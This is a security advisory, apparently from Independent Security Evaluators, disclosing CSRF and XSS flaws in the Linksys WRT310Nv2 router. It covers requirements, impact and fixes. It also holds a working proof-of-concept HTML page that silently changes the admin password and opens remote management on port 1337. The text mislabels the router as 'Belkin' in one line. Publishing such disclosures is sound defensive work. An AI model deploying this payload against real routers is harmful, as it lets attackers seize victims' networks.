Taking over the Linksys WRT310Nv2

[return to summary]

  • The WRT310Nv2 can be taken over by a remote adversary through CSRF attack.


    •

Description

The Linksys WRT310Nv2 router is susceptible to several CSRF attacks, which allow an attacker to forge HTML forms and execute actions on behalf of a legitimate user. ISE created a proof of concept demonstration that, when executed by an administrator with an active management session, changes the administrator credentials and enables remote management.

Attack Requirements

  • The victim must have an active management session with the WRT310Nv2 router.
  • The victim must be fooled in to performing an action (e.g., by clicking an attacker provided link), browse to a malicious or compromised site, or be the victim of a man-in-the-middle attack.

Details

All HTML forms present in the WRT310Nv2 are susceptible to Cross-Site Request Forgery.

  • Vulnerable Firmware is v2.0.0.1.
  • Other versions of the firmware were not tested.

Impact

A successful attack exploiting this vulnerability can give a remote adversary full control of the victim router.

Recommendations to the vendor

  • Cross-Site request forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form delivered contain a unique token.
  • In addition to HTML form tokens, HTTP referer checking should be enabled.
  • Additional information for vendors regarding immediate and long term fixes for these issues can be found on our summary page here.

Recommendations to device administrators

  • (4/13/2013) There is not currently an available firmware upgrade that will remedy this vulnerability.
  • Take additional preventative measures and precautions by following the steps outlined on our summary page here.

Proof of Concept

In the following proof of concept attack, we assume that an WRT310Nv2 device administrator with an active management session established with the router has browsed to a malicious web page. Once there, an automatic form submission takes place to the Administrator's router, from the Administrator's browser. Since the Administrator has a current session established with the router, the form submissions are processed.

Here, the administrator password is changed to ISE_1337, and remote management is enabled on port 1337.


<html>

<head>
<title>Cisco WRT310Nv2 Firmware v2.0.01 CSRF/XSS</title>
<!--*Discovered by: Jacob Holcomb 
	- Security Analyst @ Independent Security Evaluators -->
</head>

<body>

<form name="CSRFxssPWN" action="http://10.0.1.1/apply.cgi" method="post"/>
<input type="hidden" name="submit_button" value="Management"/>
<input type="hidden" name="action" value="Apply"/>
<input type="hidden" name="PasswdModify" value="1"/>
<input type="hidden" name="http_enable" value="1"/>
<input type="hidden" name="wait_time" value="0"/>
<input type="hidden" name="http_passwd" value="ISE_1337"/>
<input type="hidden" name="http_passwdConfirm" value="ISE_1337"/>
<input type="hidden" name="_http_enable" value="1"/>
<input type="hidden" name="remote_management" value="1"/>
<input type="hidden" name="remote_upgrade" value="1"/>
<input type="hidden" name="remote_ip_any" value="1"/>
<input type="hidden" name="http_wanport" value="1337"/>
<input type="hidden" name="upnp_enable" value="1"/>
<input type="hidden" name="upnp_config" value="1"/>
<input type="hidden" name="upnp_internet_dis" value="1"/>
</form>

<script>
function PwN() {document.CSRFxssPWN.submit();}; window.setTimeout(PwN, 0025);
</script>

<body>
</html>

Figure 1. Attack page 1.

At this point, the attacker can remotely administer, and thereby remotely control the WRT310Nv2.

References

  • CVE-2013-3067: Cross-Site Scripting
  • CVE-2013-3068: Cross-Site Request Forgery

Credit

  • Discovered By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
  • Exploited By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators

Contact Information

  • For more information on this particular Belkin hack, you can contact us at routers@www.ise.io
  • Alternatively, for more general information on ISE, you can reach us using contact@www.ise.io